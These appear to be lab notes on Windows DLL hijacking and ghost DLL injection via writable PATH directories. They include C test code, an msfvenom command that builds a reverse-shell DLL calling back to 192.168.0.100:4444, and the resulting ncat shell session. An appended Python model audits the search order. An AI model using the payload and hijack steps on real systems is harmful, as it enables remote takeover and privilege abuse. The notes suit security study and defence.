DLL Hijacking

DLL Hijacking Notes

DLL search path:

  • Predefined search (safe)
    • DLLs already loaded into memory
    • Known DLLs
  • Standard search order
    • The directory containing the executable
    • The Windows system directory, obtained with GetSystemDirectory (C:\Windows\System32)
    • The 16-bit system directory (C:\Windows\System)
    • The Windows directory, obtained with GetWindowsDirectory (C:\Windows)
    • The current directory of the process
    • The directories listed in the PATH environment variable

DLL Sideloading

empty_dll.dll

#include <Windows.h>

// Minimal DLL with no exports: it only needs to be loadable so that
// Process Monitor can show where the loader looks for it.
BOOL WINAPI DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Invoke-Dll.exe

#include <Windows.h>
#include <tchar.h>
#include <stdio.h>

int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
    if (argc < 2) {
        wprintf(L"Usage: Invoke-Dll.exe <dll name>\n");
        return 1;
    }
    // A bare file name (no path) makes LoadLibrary walk the standard search order above
    HMODULE hModule = LoadLibrary(argv[1]);
    if (hModule) {
        wprintf(L"LoadLibrary() OK\n");
        FreeLibrary(hModule);
    }
    else {
        wprintf(L"LoadLibrary() KO - Error: %lu\n", GetLastError());
    }
    return 0;
}


Process Monitor Filter:

  • Process Name is Invoke-Dll.exe
  • Path contains empty_dll

PATH

Moving empty_dll.dll out of the standard search path makes the DLL search order visible:


Placing empty_dll.dll in C:\Windows\:

NAME NOT FOUND


Check whether the program directory is writable:

C:\Users\0x20C>icacls "C:\Users\0x20C\Desktop\dll hijacking"

C:\Users\0x20C\Desktop\dll hijacking
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
DESKTOP-ME4U4MD\0x20C:(I)(OI)(CI)(F)

Generate a malicious DLL to replace the original DLL:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.100 LPORT=4444 -f dll -o empty_dll.dll

Run the application:

Invoke-Dll.exe empty_dll.dll

A reverse shell comes back:

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.0.106.
Ncat: Connection from 192.168.0.106:50406.
Microsoft Windows [Version 10.0.19041.572]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\Users\0x20C\Desktop\dll hijacking>whoami
whoami
desktop-me4u4md\0x20c

Ghost DLL injection

A DLL injection technique that relies on %PATH%: the loader falls through to the PATH directories when the DLL is not found earlier in the search order.

PATH

C:\Program Files (x86)\Python38-32\Scripts\
C:\Program Files (x86)\Python38-32\
C:\Windows\system32
C:\Windows
C:\Windows\System32\Wbem
C:\Windows\System32\WindowsPowerShell\v1.0\
C:\Windows\System32\OpenSSH\
C:\Program Files (x86)\IncrediBuild
C:\Users\0x20C\AppData\Local\Microsoft\WindowsApps
C:\Program Files (x86)\Vim\vim82
C:\MinGW\bin
C:\Users\0x20C\AppData\Roaming\Python\Python38\Scripts

Pick a writable directory:

C:\Users\0x20C\AppData\Local\Microsoft\WindowsApps

SUCCESS
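As an added example that is not part of these notes: a small Python model of the search order listed at the top (SafeDllSearchMode on, as in that list, or off), applied to the constructed scenario from the notes, where the directory of Invoke-Dll.exe and the WindowsApps PATH entry are the user-writable locations. It reports where a DLL name would resolve and which user-writable directories the loader consults before reaching it; the directory names come from the notes, while the pinned names and the writability flags are assumptions.

```python
from dataclasses import dataclass, field

def norm(p):
    return p.rstrip("\\").lower()

@dataclass
class SearchEnv:
    app_dir: str            # directory containing the executable
    cwd: str                # current directory of the process
    path_dirs: list         # %PATH% entries, in order
    system32: str = r"C:\Windows\System32"
    system16: str = r"C:\Windows\System"
    windows: str = r"C:\Windows"
    pinned: set = field(default_factory=set)  # KnownDLLs and modules already in memory (assumed)
    safe_dll_search_mode: bool = True         # the default, matching the order in the notes

def search_order(env):
    # With SafeDllSearchMode off, the current directory is searched right after the app dir
    system = [env.system32, env.system16, env.windows]
    head = [env.app_dir] + system + [env.cwd] if env.safe_dll_search_mode else [env.app_dir, env.cwd] + system
    return head + list(env.path_dirs)

def resolve(env, dll_name, existing, writable):
    """Return (path the loader would pick, or None; user-writable dirs it consulted first)."""
    if dll_name.lower() in {p.lower() for p in env.pinned}:
        return "<already mapped>", []   # pinned names never reach the on-disk search
    existing, writable = {norm(p) for p in existing}, {norm(d) for d in writable}
    exposed, seen = [], set()
    for d in search_order(env):
        if norm(d) in seen:             # duplicate entries (e.g. cwd == app dir) count once
            continue
        seen.add(norm(d))
        candidate = d.rstrip("\\") + "\\" + dll_name
        if norm(candidate) in existing:
            return candidate, exposed
        if norm(d) in writable:         # searched before the real DLL and user-writable
            exposed.append(d)
    return None, exposed

# Constructed scenario taken from the notes: icacls showed the app directory is
# writable by the user, and the WindowsApps entry of %PATH% is also user-writable.
APP_DIR = r"C:\Users\0x20C\Desktop\dll hijacking"
WINDOWS_APPS = r"C:\Users\0x20C\AppData\Local\Microsoft\WindowsApps"
ENV = SearchEnv(app_dir=APP_DIR, cwd=APP_DIR, pinned={"kernel32.dll", "ntdll.dll"},
                path_dirs=[r"C:\Windows\system32", r"C:\Windows",
                           r"C:\Windows\System32\Wbem", WINDOWS_APPS, r"C:\MinGW\bin"])

def audit(dll_name, existing_files):
    return resolve(ENV, dll_name, existing_files, [APP_DIR, WINDOWS_APPS])
```

`audit("empty_dll.dll", [])` reproduces the ghost-DLL case from the notes: nothing is found, and both the program directory and WindowsApps are reported as user-writable locations consulted along the way.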